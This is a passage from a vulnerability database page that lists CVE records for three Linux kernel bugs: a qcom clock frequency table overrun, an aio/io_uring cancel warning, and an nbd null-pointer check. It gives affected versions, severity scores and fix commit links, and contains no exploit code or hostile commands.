"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "421b135aceac",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "dcb13b5c9ae8",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "db4066e3ab6b",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "cdbc6e2d8108",
"status": "affected",
"version": "d9db07f088af",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.11",
"status": "unaffected",
"version": "5.10.215",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "5.16",
"status": "unaffected",
"version": "5.15.154",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.7",
"status": "unaffected",
"version": "6.6.24",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.8",
"status": "unaffected",
"version": "6.7.12",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.9",
"status": "unaffected",
"version": "6.8.3",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:5.6:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.6"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "6.2",
"status": "unaffected",
"version": "6.1.84",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26970",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-05T21:08:38.341203Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125 Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-05T21:08:55.759Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.800Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ae60e3342296f766f88911d39199f77b05f657a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4527ee3de365a742215773d20f07db3e2c06f3b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/852db52b45ea96dac2720f108e7c7331cd3738bb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/421b135aceace99789c982f6a77ce9476564fb52"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dcb13b5c9ae8743f99a96f392186527c3df89198"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/db4066e3ab6b3d918ae2b92734a89c04fe82cc1d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/gcc-ipq6018.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ae60e3342296f766f88911d39199f77b05f657a6",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
},
{
"lessThan": "b4527ee3de365a742215773d20f07db3e2c06f3b",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
},
{
"lessThan": "852db52b45ea96dac2720f108e7c7331cd3738bb",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
},
{
"lessThan": "421b135aceace99789c982f6a77ce9476564fb52",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
},
{
"lessThan": "dcb13b5c9ae8743f99a96f392186527c3df89198",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
},
{
"lessThan": "db4066e3ab6b3d918ae2b92734a89c04fe82cc1d",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
},
{
"lessThan": "cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d",
"status": "affected",
"version": "d9db07f088af01a1080d01de363141b673c7d646",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/clk/qcom/gcc-ipq6018.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: gcc-ipq6018: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:06.578Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ae60e3342296f766f88911d39199f77b05f657a6"
},
{
"url": "https://git.kernel.org/stable/c/b4527ee3de365a742215773d20f07db3e2c06f3b"
},
{
"url": "https://git.kernel.org/stable/c/852db52b45ea96dac2720f108e7c7331cd3738bb"
},
{
"url": "https://git.kernel.org/stable/c/421b135aceace99789c982f6a77ce9476564fb52"
},
{
"url": "https://git.kernel.org/stable/c/dcb13b5c9ae8743f99a96f392186527c3df89198"
},
{
"url": "https://git.kernel.org/stable/c/db4066e3ab6b3d918ae2b92734a89c04fe82cc1d"
},
{
"url": "https://git.kernel.org/stable/c/cdbc6e2d8108bc47895e5a901cfcaf799b00ca8d"
}
],
"title": "clk: qcom: gcc-ipq6018: fix terminating of frequency table arrays",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26970",
"datePublished": "2024-05-01T05:19:55.293Z",
"dateReserved": "2024-02-19T14:20:24.202Z",
"dateUpdated": "2025-05-04T09:01:06.578Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26764 (GCVE-0-2024-26764)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fs/aio: Restrict kiocb_set_cancel_fn() to I/O submitted via libaio
If kiocb_set_cancel_fn() is called for I/O submitted via io_uring, the
following kernel warning appears:
WARNING: CPU: 3 PID: 368 at fs/aio.c:598 kiocb_set_cancel_fn+0x9c/0xa8
Call trace:
kiocb_set_cancel_fn+0x9c/0xa8
ffs_epfile_read_iter+0x144/0x1d0
io_read+0x19c/0x498
io_issue_sqe+0x118/0x27c
io_submit_sqes+0x25c/0x5fc
__arm64_sys_io_uring_enter+0x104/0xab0
invoke_syscall+0x58/0x11c
el0_svc_common+0xb4/0xf4
do_el0_svc+0x2c/0xb0
el0_svc+0x2c/0xa4
el0t_64_sync_handler+0x68/0xb4
el0t_64_sync+0x1a4/0x1a8
Fix this by setting the IOCB_AIO_RW flag for read and write I/O that is
submitted by libaio.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26764",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-03T18:05:37.687851Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:01.111Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.386Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/337b543e274fe7a8f47df3c8293cc6686ffa620f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea1cd64d59f22d6d13f367d62ec6e27b9344695f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d7b6fa97ec894edd02f64b83e5e72e1aa352f353"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/18f614369def2a11a52f569fe0f910b199d13487"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e7e23fc5d5fe422827c9a43ecb579448f73876c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1dc7d74fe456944a9b1c57bd776280249f441ac6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b820de741ae48ccf50dd95e297889c286ff4f760"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/aio.c",
"include/linux/fs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "337b543e274fe7a8f47df3c8293cc6686ffa620f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ea1cd64d59f22d6d13f367d62ec6e27b9344695f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d7b6fa97ec894edd02f64b83e5e72e1aa352f353",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "18f614369def2a11a52f569fe0f910b199d13487",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e7e23fc5d5fe422827c9a43ecb579448f73876c7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1dc7d74fe456944a9b1c57bd776280249f441ac6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b820de741ae48ccf50dd95e297889c286ff4f760",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/aio.c",
"include/linux/fs.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/aio: Restrict kiocb_set_cancel_fn() to I/O submitted via libaio\n\nIf kiocb_set_cancel_fn() is called for I/O submitted via io_uring, the\nfollowing kernel warning appears:\n\nWARNING: CPU: 3 PID: 368 at fs/aio.c:598 kiocb_set_cancel_fn+0x9c/0xa8\nCall trace:\n kiocb_set_cancel_fn+0x9c/0xa8\n ffs_epfile_read_iter+0x144/0x1d0\n io_read+0x19c/0x498\n io_issue_sqe+0x118/0x27c\n io_submit_sqes+0x25c/0x5fc\n __arm64_sys_io_uring_enter+0x104/0xab0\n invoke_syscall+0x58/0x11c\n el0_svc_common+0xb4/0xf4\n do_el0_svc+0x2c/0xb0\n el0_svc+0x2c/0xa4\n el0t_64_sync_handler+0x68/0xb4\n el0t_64_sync+0x1a4/0x1a8\n\nFix this by setting the IOCB_AIO_RW flag for read and write I/O that is\nsubmitted by libaio."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:58.706Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/337b543e274fe7a8f47df3c8293cc6686ffa620f"
},
{
"url": "https://git.kernel.org/stable/c/b4eea7a05ee0ab5ab0514421e6ba8c5d249cf942"
},
{
"url": "https://git.kernel.org/stable/c/ea1cd64d59f22d6d13f367d62ec6e27b9344695f"
},
{
"url": "https://git.kernel.org/stable/c/d7b6fa97ec894edd02f64b83e5e72e1aa352f353"
},
{
"url": "https://git.kernel.org/stable/c/18f614369def2a11a52f569fe0f910b199d13487"
},
{
"url": "https://git.kernel.org/stable/c/e7e23fc5d5fe422827c9a43ecb579448f73876c7"
},
{
"url": "https://git.kernel.org/stable/c/1dc7d74fe456944a9b1c57bd776280249f441ac6"
},
{
"url": "https://git.kernel.org/stable/c/b820de741ae48ccf50dd95e297889c286ff4f760"
}
],
"title": "fs/aio: Restrict kiocb_set_cancel_fn() to I/O submitted via libaio",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26764",
"datePublished": "2024-04-03T17:00:46.962Z",
"dateReserved": "2024-02-19T14:20:24.172Z",
"dateUpdated": "2025-05-04T08:55:58.706Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27025 (GCVE-0-2024-27025)
Vulnerability from cvelistv5
Published
2024-05-01 12:49
Modified
2025-05-04 09:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nbd: null check for nla_nest_start
nla_nest_start() may fail and return NULL. Insert a check and set errno
based on other call sites within the same source code.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 Version: 47d902b90a32a42a3d33aef3a02170fc6f70aa23 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27025",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:40:20.868698Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:45:55.898Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.917Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/44214d744be32a4769faebba764510888f1eb19e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4af837db0fd3679fabc7b7758397090b0c06dced"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98e60b538e66c90b9a856828c71d4e975ebfa797"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/96436365e5d80d0106ea785a4f80a58e7c9edff8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7f5aed55829f376e4f7e5ea5b80ccdcb023e983"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e803040b368d046434fbc8a91945c690332c4fcf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba6a9970ce9e284cbc04099361c58731e308596a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31edf4bbe0ba27fd03ac7d87eb2ee3d2a231af6d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/block/nbd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "44214d744be32a4769faebba764510888f1eb19e",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "4af837db0fd3679fabc7b7758397090b0c06dced",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "98e60b538e66c90b9a856828c71d4e975ebfa797",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "96436365e5d80d0106ea785a4f80a58e7c9edff8",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "b7f5aed55829f376e4f7e5ea5b80ccdcb023e983",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "e803040b368d046434fbc8a91945c690332c4fcf",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "ba6a9970ce9e284cbc04099361c58731e308596a",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
},
{
"lessThan": "31edf4bbe0ba27fd03ac7d87eb2ee3d2a231af6d",
"status": "affected",
"version": "47d902b90a32a42a3d33aef3a02170fc6f70aa23",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/block/nbd.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.12"
},
{
"lessThan": "4.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
